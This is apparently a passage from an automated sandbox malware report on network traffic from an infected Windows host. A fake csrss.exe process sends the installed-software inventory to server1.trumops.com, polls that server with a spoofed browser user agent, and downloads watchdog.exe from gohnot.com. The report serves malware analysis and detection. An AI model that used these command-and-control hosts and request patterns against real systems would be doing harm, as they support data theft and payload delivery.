                                                                    Oct 18, 2021 08:02:35.550400019 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550422907 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550447941 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550474882 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550529003 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550539017 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550565004 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550566912 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550612926 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550616980 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550656080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550656080 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550693035 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550718069 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550731897 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550761938 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550770998 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550796032 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550807953 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550815105 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550848007 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550851107 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550884962 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550915956 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550935030 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.550936937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.550977945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551014900 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551067114 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551068068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551105976 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551127911 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551142931 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551167011 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551214933 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551249027 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551274061 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551287889 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551300049 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551325083 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551330090 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551363945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551373959 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551409006 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551410913 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551451921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551460028 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551490068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551527977 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551538944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551565886 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551567078 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551603079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551640987 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551660061 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551678896 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551690102 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551723003 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551727057 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551769018 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551810980 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551820993 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551848888 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551848888 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551887035 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551899910 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551923037 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551940918 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551961899 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.551973104 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.551999092 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552047014 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.552047014 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552088976 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552125931 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552136898 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.552164078 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552201986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.552212954 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.552249908 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.570622921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.570657015 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.571324110 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587641954 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587668896 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587697029 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587709904 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587724924 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587738991 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587750912 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587763071 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587779999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587805033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587837934 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587850094 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587878942 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587889910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587889910 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587917089 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587919950 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587944031 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.587944984 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587958097 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.587977886 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588006973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588009119 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588030100 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588032007 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588052988 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588082075 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588085890 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588099003 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588108063 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588119030 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588140011 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588151932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588166952 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588191986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588217974 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588233948 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588238955 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588248014 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588265896 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588277102 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588291883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588316917 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588347912 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588347912 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588361025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588372946 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.588382006 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588401079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588422060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.588501930 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.591701984 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.591737986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.591805935 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.633627892 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:36.726557016 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:43.437769890 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:43.437808990 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:43.437978029 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:43.439759970 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:43.439805031 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.491847992 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.492366076 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.492424965 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.493196964 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.493211031 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.496114016 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.496251106 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.499594927 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.499773979 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.500257015 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:02:44.500310898 CEST44349841104.21.79.9192.168.2.4
                                                                    Oct 18, 2021 08:02:44.548733950 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:03:05.609975100 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:03:05.626013041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:03:14.507342100 CEST49841443192.168.2.4104.21.79.9
                                                                    Oct 18, 2021 08:03:14.507356882 CEST44349841104.21.79.9192.168.2.4

                                                                    UDP Packets


                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 18, 2021 08:01:27.399797916 CEST | 192.168.2.4 | 8.8.8.8 | 0xc514 | Standard query (0) | trumops.com | 16 | IN (0x0001)
Oct 18, 2021 08:01:27.427885056 CEST | 192.168.2.4 | 8.8.8.8 | 0xb2e2 | Standard query (0) | logs.trumops.com | 16 | IN (0x0001)
Oct 18, 2021 08:01:27.454231977 CEST | 192.168.2.4 | 8.8.8.8 | 0x23ba | Standard query (0) | 8db1a514-f568-41bf-af6a-dffb7cea0346.uuid.trumops.com | 16 | IN (0x0001)
Oct 18, 2021 08:01:27.512409925 CEST | 192.168.2.4 | 8.8.8.8 | 0x79cc | Standard query (0) | trumops.com | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:27.647305965 CEST | 192.168.2.4 | 8.8.8.8 | 0xab2e | Standard query (0) | server1.trumops.com | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:31.396657944 CEST | 192.168.2.4 | 8.8.8.8 | 0x6b1f | Standard query (0) | trumops.com | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:33.459969044 CEST | 192.168.2.4 | 8.8.8.8 | 0x808 | Standard query (0) | server1.trumops.com | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:45.280299902 CEST | 192.168.2.4 | 8.8.8.8 | 0xd048 | Standard query (0) | server1.trumops.com | A (IP address) | IN (0x0001)
Oct 18, 2021 08:02:35.220702887 CEST | 192.168.2.4 | 8.8.8.8 | 0xa649 | Standard query (0) | gohnot.com | A (IP address) | IN (0x0001)
Oct 18, 2021 08:02:36.869208097 CEST | 192.168.2.4 | 8.8.8.8 | 0xa3f8 | Standard query (0) | e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com | 16 | IN (0x0001)
Oct 18, 2021 08:02:41.302114964 CEST | 192.168.2.4 | 8.8.8.8 | 0xf932 | Standard query (0) | trumops.com | A (IP address) | IN (0x0001)
Oct 18, 2021 08:02:43.415529966 CEST | 192.168.2.4 | 8.8.8.8 | 0xf342 | Standard query (0) | server1.trumops.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 18, 2021 08:01:27.420635939 CEST | 8.8.8.8 | 192.168.2.4 | 0xc514 | No error (0) | trumops.com |  |  | TXT (Text strings) | IN (0x0001)
Oct 18, 2021 08:01:27.448276043 CEST | 8.8.8.8 | 192.168.2.4 | 0xb2e2 | No error (0) | logs.trumops.com |  |  | TXT (Text strings) | IN (0x0001)
Oct 18, 2021 08:01:27.475474119 CEST | 8.8.8.8 | 192.168.2.4 | 0x23ba | Name error (3) | 8db1a514-f568-41bf-af6a-dffb7cea0346.uuid.trumops.com | none | none | 16 | IN (0x0001)
Oct 18, 2021 08:01:27.668375969 CEST | 8.8.8.8 | 192.168.2.4 | 0xab2e | No error (0) | server1.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:27.668375969 CEST | 8.8.8.8 | 192.168.2.4 | 0xab2e | No error (0) | server1.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:33.481452942 CEST | 8.8.8.8 | 192.168.2.4 | 0x808 | No error (0) | server1.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:33.481452942 CEST | 8.8.8.8 | 192.168.2.4 | 0x808 | No error (0) | server1.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:45.301007032 CEST | 8.8.8.8 | 192.168.2.4 | 0xd048 | No error (0) | server1.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:01:45.301007032 CEST | 8.8.8.8 | 192.168.2.4 | 0xd048 | No error (0) | server1.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:02:35.241746902 CEST | 8.8.8.8 | 192.168.2.4 | 0xa649 | No error (0) | gohnot.com |  | 172.67.196.11 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:02:35.241746902 CEST | 8.8.8.8 | 192.168.2.4 | 0xa649 | No error (0) | gohnot.com |  | 104.21.92.165 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:02:36.890609980 CEST | 8.8.8.8 | 192.168.2.4 | 0xa3f8 | No error (0) | e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com |  |  | TXT (Text strings) | IN (0x0001)
Oct 18, 2021 08:02:43.435981989 CEST | 8.8.8.8 | 192.168.2.4 | 0xf342 | No error (0) | server1.trumops.com |  | 104.21.79.9 | A (IP address) | IN (0x0001)
Oct 18, 2021 08:02:43.435981989 CEST | 8.8.8.8 | 192.168.2.4 | 0xf342 | No error (0) | server1.trumops.com |  | 172.67.139.144 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• server1.trumops.com
• gohnot.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49767 | 172.67.139.144 | 443 | C:\Windows\rss\csrss.exe

Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49768 | 172.67.139.144 | 443 | C:\Windows\rss\csrss.exe

Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49769 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe

Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49841 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe

Timestamp | kBytes transferred | Direction | Data

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49816 | 172.67.196.11 | 80 | C:\Windows\rss\csrss.exe

Timestamp | kBytes transferred | Direction | Data
Oct 18, 2021 08:02:35.261605024 CEST | 5138 | OUT | GET /370c4779d730135afa0e64399be9936c/watchdog.exe HTTP/1.1
Host: gohnot.com
User-Agent: Go-http-client/1.1
Uuid: 8db1a514-f568-41bf-af6a-dffb7cea0346
Version: 183
Accept-Encoding: gzip
Oct 18, 2021 08:02:35.287981033 CEST | 5139 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 06:02:35 GMT
Content-Type: application/octet-stream
Content-Length: 2102272
Connection: keep-alive
content-disposition: attachment; filename=watchdog.exe
etag: "61680a87-201400"
last-modified: Thu, 14 Oct 2021 10:46:31 GMT
Cache-Control: max-age=3600
CF-Cache-Status: HIT
Age: 125
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SIEIN%2F1XF0Uz1zUWhWjjtVKcK6yr2rylxw1%2B9wHdhNwCZmlQnik1Y11rhtQkNHt8%2F06zowdGfNcUGMzVlV7%2BzZVdUTz7EvckfqyHt3WHegA8D9QEHcXnQQxKcd0I"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 69ff8f0268394357-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49767 | 172.67.139.144 | 443 | C:\Windows\rss\csrss.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-18 06:01:27 UTC | 0 | OUT | POST /bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 HTTP/1.1
Host: server1.trumops.com
User-Agent: Go-http-client/1.1
Content-Length: 19043
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
2021-10-18 06:01:27 UTC | 0 | OUT | Data Ascii: [{"display_name":"Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Fontcore","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0
2021-10-18 06:01:27 UTC | 1 | OUT | Data Ascii: s de corrección de Microsoft Office 2016: español","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"AddressBook","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2012 x64 Additional Runtime - 11
2021-10-18 06:01:27 UTC | 3 | OUT | Data Ascii: splay_version":"12.0.21005","install_date":"20190627"},{"display_name":"Adobe Acrobat Reader DC","display_version":"19.012.20035","install_date":"20190627"},{"display_name":"Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005","display_version":"12
2021-10-18 06:01:27 UTC | 4 | OUT | Data Ascii: isplay_name":"Update for Microsoft Office 2016 (KB2920712) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit Edition","display_version":"","install_date":""},{"display_name
2021-10-18 06:01:27 UTC | 8 | OUT | Data Ascii: Bit Edition","display_version":"","install_date":""},{"display_name":"Definition Update for Microsoft Office 2016 (KB3115407) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Publisher 2016 (KB4011097)
2021-10-18 06:01:27 UTC | 12 | OUT | Data Ascii: "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005","display_version":"12.0.21005","install_date":"20190627"},{"displa
2021-10-18 06:01:27 UTC | 16 | OUT | Data Ascii: ion":"","install_date":""},{"display_name":"Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319","display_version":"10.0.30319","install_date":"20190627"},{"display_name":"Security Update for Microsoft Office 2016 (KB4484214) 32-Bit Edition","disp
2021-10-18 06:02:17 UTC | 19 | IN | HTTP/1.1 404 Not Found
Date: Mon, 18 Oct 2021 06:02:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/8.0.11
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6e7jhhRmMzOf4z%2FUVKvoyuNsNr6MSHqph18xAkrV9pOs%2B%2Boq4%2BF2jzazvCMxyCBU2NQlVPEvKVhjhPqX1uOZ%2FoiylBBXdSh2%2FXzdzssuJjAhBpX72Lj2UL1Oon0%2B49gNCRBVJEbz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 69ff8d5c680642ee-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-10-18 06:02:17 UTC | 20 | IN | Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
2021-10-18 06:02:17 UTC | 21 | IN | Data Ascii: al 9pt "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></he
2021-10-18 06:02:17 UTC | 21 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49768 | 172.67.139.144 | 443 | C:\Windows\rss\csrss.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-18 06:01:33 UTC | 18 | OUT | POST /api/poll HTTP/1.1
Host: server1.trumops.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Content-Length: 640
Accept-Encoding: gzip
                                                                    2021-10-18 06:02:21 UTC | 21 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Mon, 18 Oct 2021 06:02:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-powered-by: PHP/8.0.11
                                                                    set-cookie: PHPSESSID=msr8acg9pq7sp3dcop8c04029e; path=/; HttpOnly
                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                    pragma: no-cache
                                                                    access-control-allow-credentials: false
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MgqHad%2BRL1Jwi19koLru3c3g79m4yhxIQIen93O1%2FIzAOqJAqXouucy1HssWOW9a2T8dJbYXCbBqiBBas6ee%2FLto73zfabvgBZk3r04GcxpJybUfENx4vZPL%2BJKObmAFzN6d9qUJ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 69ff8d80de494e32-FRA
                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    2 | 192.168.2.4 | 49769 | 104.21.79.9 | 443 | C:\Windows\rss\csrss.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    2021-10-18 06:01:45 UTC | 19 | OUT | GET /api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 HTTP/1.1
                                                                    Host: server1.trumops.com
                                                                    User-Agent: Go-http-client/1.1
                                                                    Accept-Encoding: gzip
                                                                    2021-10-18 06:02:35 UTC | 22 | IN | HTTP/1.1 200 OK
                                                                    Date: Mon, 18 Oct 2021 06:02:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-powered-by: PHP/8.0.11
                                                                    access-control-allow-credentials: false
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zuSgSsvjkAE8UYMxxWMQFb9SRGfpcVTYqIhk98nXIlngDZGeSl3NnP%2B1s6FSoV3H1GVbKaMafdFLdE4g0A1zn1CD6v0DYQWAq5%2BHXhll4AQ3wVcnV9JAq81hCR5spkYNG%2FNhtjKD"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 69ff8dca8d40973c-FRA
